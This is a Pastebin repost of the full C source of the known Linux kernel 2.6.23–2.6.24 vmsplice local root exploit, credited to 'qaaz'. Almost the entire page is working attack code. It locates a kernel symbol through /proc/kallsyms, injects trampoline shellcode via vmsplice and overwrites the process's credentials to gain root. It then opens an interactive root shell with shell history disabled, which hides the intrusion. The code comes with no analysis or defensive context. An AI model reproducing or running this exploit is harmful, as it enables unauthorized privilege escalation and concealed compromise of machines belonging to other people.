Advertisement
Guest User

Untitled

a guest
Sep 23rd, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.12 KB | None | 0 0
  1. ========================================================
  2. Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit
  3. ========================================================
  4.  
  5.  
  6.  
  7. /*
  8. * diane_lane_fucked_hard.c
  9. *
  10. * Linux vmsplice Local Root Exploit
  11. * By qaaz
  12. *
  13. * Linux 2.6.23 - 2.6.24
  14. */
  15. #define _GNU_SOURCE
  16. #include <stdio.h>
  17. #include <errno.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <unistd.h>
  21. #include <sys/uio.h>
  22.  
  23. #define TARGET_PATTERN " sys_vm86old"
  24. #define TARGET_SYSCALL 113
  25.  
  26. #ifndef __NR_vmsplice
  27. #define __NR_vmsplice 316
  28. #endif
  29.  
  30. #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
  31. #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
  32.  
  33. #define TRAMP_CODE (void *) trampoline
  34. #define TRAMP_SIZE ( sizeof(trampoline) - 1 )
  35.  
  36. unsigned char trampoline[] =
  37. "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */
  38. "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */
  39. "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
  40. "\x75\x02" /* jne +2 */
  41. "\xff\xd1" /* call *%ecx */
  42. "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */
  43. "\xc3" /* ret */
  44. ;
  45.  
  46. void die(char *msg, int err)
  47. {
  48. printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  49. fflush(stdout);
  50. fflush(stderr);
  51. exit(1);
  52. }
  53.  
  54. long get_target()
  55. {
  56. FILE *f;
  57. long addr = 0;
  58. char line[128];
  59.  
  60. f = fopen("/proc/kallsyms", "r");
  61. if (!f) die("/proc/kallsyms", errno);
  62.  
  63. while (fgets(line, sizeof(line), f)) {
  64. if (strstr(line, TARGET_PATTERN)) {
  65. addr = strtoul(line, NULL, 16);
  66. break;
  67. }
  68. }
  69.  
  70. fclose(f);
  71. return addr;
  72. }
  73.  
  74. static inline __attribute__((always_inline))
  75. void * get_current()
  76. {
  77. unsigned long curr;
  78. __asm__ __volatile__ (
  79. "movl %%esp, %%eax ;"
  80. "andl %1, %%eax ;"
  81. "movl (%%eax), %0"
  82. : "=r" (curr)
  83. : "i" (~8191)
  84. );
  85. return (void *) curr;
  86. }
  87.  
  88. static uint uid, gid;
  89.  
  90. void kernel_code()
  91. {
  92. int i;
  93. uint *p = get_current();
  94.  
  95. for (i = 0; i < 1024-13; i++) {
  96. if (p[0] == uid && p[1] == uid &&
  97. p[2] == uid && p[3] == uid &&
  98. p[4] == gid && p[5] == gid &&
  99. p[6] == gid && p[7] == gid) {
  100. p[0] = p[1] = p[2] = p[3] = 0;
  101. p[4] = p[5] = p[6] = p[7] = 0;
  102. p = (uint *) ((char *)(p + 8) + sizeof(void *));
  103. p[0] = p[1] = p[2] = ~0;
  104. break;
  105. }
  106. p++;
  107. }
  108. }
  109.  
  110. int main(int argc, char *argv[])
  111. {
  112. int pi[2];
  113. long addr;
  114. struct iovec iov;
  115.  
  116. uid = getuid();
  117. gid = getgid();
  118. setresuid(uid, uid, uid);
  119. setresgid(gid, gid, gid);
  120.  
  121. printf("-----------------------------------\n");
  122. printf(" Linux vmsplice Local Root Exploit\n");
  123. printf(" By qaaz\n");
  124. printf("-----------------------------------\n");
  125.  
  126. if (!uid || !gid)
  127. die("!@#$", 0);
  128.  
  129. addr = get_target();
  130. printf("[+] addr: 0x%lx\n", addr);
  131.  
  132. if (pipe(pi) < 0)
  133. die("pipe", errno);
  134.  
  135. iov.iov_base = (void *) addr;
  136. iov.iov_len = TRAMP_SIZE;
  137.  
  138. write(pi[1], TRAMP_CODE, TRAMP_SIZE);
  139. _vmsplice(pi[0], &iov, 1, 0);
  140.  
  141. gimmeroot();
  142.  
  143. if (getuid() != 0)
  144. die("wtf", 0);
  145.  
  146. printf("[+] root\n");
  147. putenv("HISTFILE=/dev/null");
  148. execl("/bin/bash", "bash", "-i", NULL);
  149. die("/bin/bash", errno);
  150. return 0;
  151. }
  152.  
  153.  
  154. `
  155.  
  156. # 0day.today [2019-09-23] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement